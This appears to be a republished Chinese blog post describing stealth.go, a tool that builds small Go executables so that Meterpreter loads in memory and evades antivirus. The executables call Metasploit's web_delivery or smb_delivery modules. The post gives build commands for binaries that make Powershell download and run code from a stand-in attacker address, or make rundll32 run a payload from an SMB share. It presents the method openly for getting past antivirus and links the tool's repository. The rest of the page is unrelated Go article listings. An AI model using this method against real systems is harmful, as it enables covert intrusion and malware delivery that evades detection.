首页 / 后端技术 / Go语言

使用Golang绕过杀毒软件

zhxx515 9 字体: 放大 缩小

前言Metasploit有两个优秀的模块,用于调用Web服务器或SMB服务器将简单的shell提升到Meterpreter。第一个模块是exploit/multi/script/web_delivery,另一个是exploit/windows/smb/smb_delivery。使用这些模块你可以执行简单的Powershell,PHP,Python或Rundll命令将现有的shell提升到meterpereter。

如果你没有shell那你能做的就是运行一个可执行文件。你可以创建一个meterpreter或shell payload,并尝试上传和运行这些可执行文件,但是一旦它们写入磁盘就很容易被杀软捕获。相反,如果我们可以创建一个简单的可执行文件,只对web_delivery或smb_delivery进行必要的调用,然后在内存中加载meterpreter。这个可执行文件就可能不会被杀软捕获。

stealth.gostealth.go脚本正是这种原理。它需要几个参数:所需的payload类型,Metasploit服务器和端口以及文件夹名称,并创建一个小的Golang可执行文件,以便对Metasploit进行相应的调用。

要使用脚本你将需要在每个计划构建可执行文件的操作系统上安装最新版本的Golang。安装Golang后,执行以下操作:

根据需要配置Metasploit web_delivery或smb_delivery模块。请注意web_delivery模块需要设置URIPATH参数和SHARE参数,并保证FOLDER_NAME参数未设置。

运行stealth.go模块来构建一个名为shell(* nix)或shell.exe(Windows)的二进制文件。

go run stealth.go ps 10.10.10.18080 test这将构建一个可执行文件,调用Powershell从http://10.10.10.1:8080/test下载并执行代码。

go run stealth.go smb 10.10.10.1445 test这将构建一个可执行文件,将调用rundll32从\10.10.10.1\test传递并执行有效payload。

项目地址stealth.go代码可以在我的Github中找到

https://github.com/averagesecurityguy/scripts

你会喜欢

支持MACRBACABAC多种模型的Golang访问控制框架Casbin

----------------------------------

要闻,干货,原创,专业

关注"黑白之道"微信:i77169

华夏黑客同盟我们坚持,自由,免费,共享!

「点点赞赏,手留余香」

赞赏

  • 趣境6蔂藙
  • 1人赞过
1
0
0
  • 9人看过
 反馈
返回列表
评论 0 请文明上网,理性发言

相关文章

  • 我为什么选择使用Go语言?
    "谢孟军:EGO会员、GopherChina组织者、《GoWeb编程》一书的作者,专注Golang技术架构。本文来自EGO会员群分享,入群方式见文末在这里我主要想和大家分享一些Go和我个人的成长史。首先聊聊Go,在2009年全部开源出来后,它获得了当年的年度语言,但是直到2011年它才发布正式的稳定版本。Go稳定版发布
    萌萌蔷 4 0 0 条评论
  • Go语言入门分享
    前言 曾经我是一名以Java语言为主的开发者,做过JavaWeb相关的开发,后来转Android,还是离不开Java,直到转去做大前端了,其实也就是一直在用JS写业务。如今由于个人发展原因,来到阿里云,由于项目需要就撸起了Go语言;多年编程经验告诉我,语言只是工具罢了,重要的还是其思想与逻辑,所以只需学学语法就好了,
    2017xz 4 0 0 条评论
  • 解读Go语言的2018:怎么就在中国火成这样了?
    作者|郝林 编辑|小智 本篇文章是Go语言2018年终盘点,力求客观、深入分析2018年Go语言的技术发展现状,同时对明年可能的发展情况进行预测和展望。 今年真可谓是不平静的一年,前有人工智能国家级战略的发布,行业已经在大跨步的挺进,但人才缺口每天都在扩大;后有区块链技术从爆发式增长到大幅回落,无数程序员蜂拥而至,
    身挂音 3 3 0 条评论
  • Go语言潜力有目共睹,但它的Goroutine机制底层原理你了解吗?
    来源|后端技术指南针(ID:gh_ed1e2b37dcb6) Go语言的巨大潜力有目共睹,今天我们来学习Go语言的Goroutine机制,这也可能是Go语言最为吸引人的特性了,理解它对于掌握Go语言大有裨益,话不多说开始吧! 通过本文你将了解到以下内容: 什么是协程以及横向对比优势Go语言的Goroutine机制底层
    西邦3jk9 7 0 0 条评论
  • 一个令人敬佩的Go语言布道者
    近日,HackerNews发布了2018年7月的编程语言招聘趋势排行榜,其中,Go语言已经反超Java进入了前三名的行列。从浅绿色的Go语言走势图可以看出来,企业对于Go语言的采用情况在逐年上升。 从公司角度看,许多大厂都已经开始拥抱Go语言,包括以Java打天下的阿里巴巴,更别提深爱着Go语言的滴滴、今日头条、小米、
    愿为栽树前人 3 0 0 条评论
  • Go 语言“十诫”
    作者|白明的赞赏账户责编|欧阳姝黎 本文翻译自JohnArundel的《TencommandmentsofGo》[1]。全文如下: 作为一名全职的Go语言作家[2]和老师[3],我花了很多时间和学生们一起,帮助他们写出更清晰、更好、更有用的Go程序。我发现,我给他们的建议可以归纳总结为一套通用原则,在这里我将这些原则
    ljljjl射手 6 3 0 条评论
  • Go 语言 2018 调查报告发布
    Go官方博客今天发布了2018年Go语言调查报告。参与本次调查的5883名受访者来自103个不同的国家,官方表示,这些受访者的反馈意见将被选取用于改进Go语言的发展。 知道大家都很忙,先直接看一下调查报告摘要: 首次有一半的受访者表示Go是他们日常使用的编程语言之一。此外,在工作中用到Go语言以及在工作之余使用Go语言
    Zuepv54 3 1 0 条评论
  • Golang 新手可能会踩的 50 个坑(初级篇)
    译文:Golang新手可能会踩的50个坑原文:50ShadesofGo:Traps,Gotchas,andCommonMistakes翻译已获作者授权,转载请注明来源。 不久前发现在知乎这篇质量很高的文章,打算加上自己的理解翻译一遍。文章分为三部分:初级篇1-34,中级篇35-50,高级篇51-57 前言Go是一门简单
    近水楼台先得磊 7 0 0 条评论
  • 盘点golang中的开发神器
    关注"脚本之家",与百万开发者在一起 出处:捉虫大师(ID:gh_562cbc6dd343) 作为一名比较新的编程语言,golang的这些工具是否更加好用呢? 单元测试Java的单元测试需要使用第三方库,一般是Junit,配置起来比较复杂。在使用了golang之后发现golang自带的单元测试真的非常简单。 如果我们
    一掷决生死N 6 3 0 条评论
  • Golang 性能优化实战
    作者:trumanyan,腾讯CSIG后台开发工程师 项目背景网关服务作为统一接入服务,是大部分服务的统一入口。为了避免成功瓶颈,需要对其进行尽可能地优化。因此,特别总结一下golang后台服务性能优化的方式,并对网关服务进行优化。 技术背景: 吞吐量:每秒钟可以处理的请求数响应时间:从客户端发出请求,到收到回包的总耗
    你不知道旳事和 8 2 0 条评论
Copyright ©2012-2024 Z70.cc
粤ICP备2022084731号 | 关于我们 | 联系我们 | 隐私保护